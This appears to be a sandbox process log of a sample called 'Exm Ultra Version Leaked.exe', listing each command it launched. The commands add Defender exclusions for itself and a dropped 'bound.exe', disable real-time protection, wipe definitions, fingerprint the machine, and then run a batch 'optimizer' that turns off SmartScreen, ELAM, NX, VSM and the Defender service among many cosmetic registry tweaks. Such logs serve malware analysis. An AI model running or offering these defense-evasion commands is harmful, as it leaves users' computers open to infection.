"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2040 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=2248 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2680 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4380 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe
"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4428 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --no-appcompat-clear --mojo-platform-channel-handle=4564 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4996 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe
"C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5288 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5316 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5432 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\SYSTEM32\cmd.exe
cmd /c "Fn Opti.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\7zOCD9D2288\Exm Ultra Version Leaked.exe'
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=5728 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4660 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5796 --field-trial-handle=2044,i,2167273648988159966,7329034338797793841,262144 --variations-seed-version /prefetch:8
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Windows\system32\timeout.exe
timeout /t 2
C:\Windows\system32\fsutil.exe
fsutil behavior query memoryusage
C:\Windows\system32\fsutil.exe
fsutil behavior set memoryusage 2
C:\Windows\system32\bcdedit.exe
bcdedit /set increaseuserva 8000
C:\Windows\system32\ipconfig.exe
ipconfig /release
C:\Windows\system32\ipconfig.exe
ipconfig /renew
C:\Windows\system32\ipconfig.exe
ipconfig /flushdns
C:\Windows\system32\netsh.exe
netsh winsock reset
C:\Windows\system32\netsh.exe
netsh int tcp set global chimney=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global autotuninglevel=normal
C:\Windows\system32\netsh.exe
netsh int tcp set supplemental
C:\Windows\system32\netsh.exe
netsh int tcp set global dca=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global netdma=enabled
C:\Windows\system32\netsh.exe
netsh int tcp set global congestionprovider=ctcp
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="StopThrottling" dir=in
C:\Windows\system32\bcdedit.exe
bcdedit /set allowedinmemorysettings 0
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\bcdedit.exe
bcdedit /set debug No
C:\Windows\system32\bcdedit.exe
bcdedit /set isolatedcontext No
C:\Windows\system32\bcdedit.exe
bcdedit /set pae ForceEnable
C:\Windows\system32\bcdedit.exe
bcdedit /set bootmenupolicy Legacy
C:\Windows\system32\bcdedit.exe
bcdedit /set usefirmwarepcisettings No
C:\Windows\system32\bcdedit.exe
bcdedit /set sos Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disableelamdrivers Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set quietboot Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set x2apicpolicy Enable
C:\Windows\system32\bcdedit.exe
bcdedit /set vsmlaunchtype Off
C:\Windows\system32\bcdedit.exe
bcdedit /set usephysicaldestination No
C:\Windows\system32\bcdedit.exe
bcdedit /set ems No
C:\Windows\system32\bcdedit.exe
bcdedit /set firstmegabytepolicy UseAll
C:\Windows\system32\bcdedit.exe
bcdedit /set configaccesspolicy Default
C:\Windows\system32\bcdedit.exe
bcdedit /set linearaddress57 optin
C:\Windows\system32\bcdedit.exe
bcdedit /set noumex Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set bootems No
C:\Windows\system32\bcdedit.exe
bcdedit /set graphicsmodedisabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set extendedinput Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set highestmode Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set forcefipscrypto No
C:\Windows\system32\bcdedit.exe
bcdedit /set perfmem 0
C:\Windows\system32\bcdedit.exe
bcdedit /set configflags 0
C:\Windows\system32\bcdedit.exe
bcdedit /set uselegacyapicmode No
C:\Windows\system32\bcdedit.exe
bcdedit /set onecpu No
C:\Windows\system32\bcdedit.exe
bcdedit /set halbreakpoint No
C:\Windows\system32\bcdedit.exe
bcdedit /set forcelegacyplatform No
C:\Windows\system32\bcdedit.exe
bcdedit /set allowedinmemorysettings 0
C:\Windows\system32\bcdedit.exe
bcdedit /deletevalue useplatformclock
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\bcdedit.exe
bcdedit /set debug No
C:\Windows\system32\bcdedit.exe
bcdedit /set isolatedcontext No
C:\Windows\system32\bcdedit.exe
bcdedit /set pae ForceEnable
C:\Windows\system32\bcdedit.exe
bcdedit /set bootmenupolicy Legacy
C:\Windows\system32\bcdedit.exe
bcdedit /set usefirmwarepcisettings No
C:\Windows\system32\bcdedit.exe
bcdedit /set sos Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disableelamdrivers Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set quietboot Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set x2apicpolicy Enable
C:\Windows\system32\bcdedit.exe
bcdedit /set vsmlaunchtype Off
C:\Windows\system32\bcdedit.exe
bcdedit /set usephysicaldestination No
C:\Windows\system32\bcdedit.exe
bcdedit /set ems No
C:\Windows\system32\bcdedit.exe
bcdedit /set firstmegabytepolicy UseAll
C:\Windows\system32\bcdedit.exe
bcdedit /set configaccesspolicy Default
C:\Windows\system32\bcdedit.exe
bcdedit /set linearaddress57 optin
C:\Windows\system32\bcdedit.exe
bcdedit /set noumex Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set bootems No
C:\Windows\system32\bcdedit.exe
bcdedit /set graphicsmodedisabled No
C:\Windows\system32\bcdedit.exe
bcdedit /set extendedinput Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set highestmode Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set forcefipscrypto No
C:\Windows\system32\bcdedit.exe
bcdedit /set perfmem 0
C:\Windows\system32\bcdedit.exe
bcdedit /set configflags 0
C:\Windows\system32\bcdedit.exe
bcdedit /set uselegacyapicmode No
C:\Windows\system32\bcdedit.exe
bcdedit /set onecpu No
C:\Windows\system32\bcdedit.exe
bcdedit /set halbreakpoint No
C:\Windows\system32\bcdedit.exe
bcdedit /set forcelegacyplatform No
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformclock no
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\bcdedit.exe
bcdedit /set disableelamdrivers Yes
C:\Windows\system32\bcdedit.exe
bcdedit /set vsmlaunchtype Off
C:\Windows\system32\bcdedit.exe
bcdedit /set firstmegabytepolicy UseAll
C:\Windows\system32\bcdedit.exe
bcdedit /set forcefipscrypto No
C:\Windows\system32\bcdedit.exe
bcdedit /set perfmem 0
C:\Windows\system32\bcdedit.exe
bcdedit /set configflags 0
C:\Windows\system32\bcdedit.exe
bcdedit /set tscsyncpolicy Enhanced
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set nx AlwaysOff
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set vsmlaunchtype Off
C:\Windows\system32\bcdedit.exe
bcdedit /set forcefipscrypto No
C:\Windows\system32\bcdedit.exe
bcdedit /timeout 2
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformclock no
C:\Windows\system32\bcdedit.exe
bcdedit /set disabledynamictick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set useplatformtick yes
C:\Windows\system32\bcdedit.exe
bcdedit /set nx optout
C:\Windows\system32\bcdedit.exe
bcdedit /set bootux disabled
C:\Windows\system32\bcdedit.exe
bcdedit /set bootmenupolicy standard
C:\Windows\system32\bcdedit.exe
bcdedit /set hypervisorlaunchtype off
C:\Windows\system32\bcdedit.exe
bcdedit /set tpmbootentropy ForceDisable
C:\Windows\system32\bcdedit.exe
bcdedit /set quietboot yes
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymous" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v "restrictanonymoussam" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\CloudContent" /v "DisableWindowsSpotlightFeatures" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "LastActiveClick" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "EnableBalloonTips" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarGlomLevel" /t REG_DWORD /d "2" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "HideFileExt" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "DisableThumbnailCache" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "SeparateProcess" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "ConfirmFileDelete" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisableThumbnailsOnNetworkFolders" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "TaskbarNoNotification" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveSearch" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoResolveTrack" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoDriveTypeAutoRun" /t REG_DWORD /d "221" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoLowDiskSpaceChecks" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t REG_SZ /d "Off" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "DisableNotificationCenter" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Policies\Microsoft\Windows\Explorer" /v "NoWindowMinimizingShortcuts" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Control Panel\Desktop\WindowMetrics" /v "MinAnimate" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "CompositionPolicy" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\DWM" /v "EnableAeroPeek" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\LanmanServer\Parameters" /v "SizReqBuf" /t REG_DWORD /d "16384" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug" /v "Auto" /t REG_SZ /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "ListviewAlphaSelect" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "TaskbarAnimations" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects" /v "VisualFXSetting" /t REG_DWORD /d "3" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\CursorShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\DropShadow" /v "DefaultApplied" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\MenuAnimation" /v "DefaultApplied" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\VisualEffects\TaskbarAnimations" /v "DefaultApplied" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "AutoApproveOSDumps" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Error Reporting" /v "DontSendAdditionalData" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "DoReport" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\PCHealth\ErrorReporting" /v "ShowUI" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Control Panel\Mouse" /v "MouseHoverTime" /t REG_SZ /d "100" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "RunStartupScriptSync" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer" /v "GlobalAssocChangedCounter" /t REG_DWORD /d "91" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortana" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCloudSearch" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWeb" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "ConnectedSearchUseWebOverMeteredConnections" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "DisableWebSearch" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowSearchToUseLocation" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Windows Search" /v "AllowCortanaAboveLock" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Speech_OneCore\Preferences" /v "ModelDownloadAllowed" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization\TrainedDataStore" /v "HarvestContacts" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitTextCollection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\InputPersonalization" /v "RestrictImplicitInkCollection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Microsoft\Personalization\Settings" /v "AcceptedPrivacyPolicy" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\System\GameConfigStore" /v "GameDVR_Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\GameDVR" /v "AllowGameDVR" /t REG_DWORD /d "0" /f
C:\Windows\system32\sc.exe
sc stop dmwappushservice
C:\Windows\system32\net.exe
net stop dmwappushservice
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop dmwappushservice
C:\Windows\system32\sc.exe
sc config dmwappushservice start= disabled
C:\Windows\system32\net.exe
net stop diagnosticshub.standardcollector.service
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop diagnosticshub.standardcollector.service
C:\Windows\system32\sc.exe
sc config diagnosticshub.standardcollector.service start= disabled
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\AutoLogger\AutoLogger-Diagtrack-Listener" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Visibility" /v "DiagnosticErrorText" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticErrorText" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\WindowsSelfHost\UI\Strings" /v "DiagnosticLinkText" /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\TabletPC" /v "PreventHandwritingDataSharing" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\HandwritingErrorReports" /v "PreventHandwritingErrorReports" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableInventory" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\AppCompat" /v "DisableUAR" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Personalization" /v "NoLockScreenCamera" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AdvertisingInfo" /v "Enabled" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
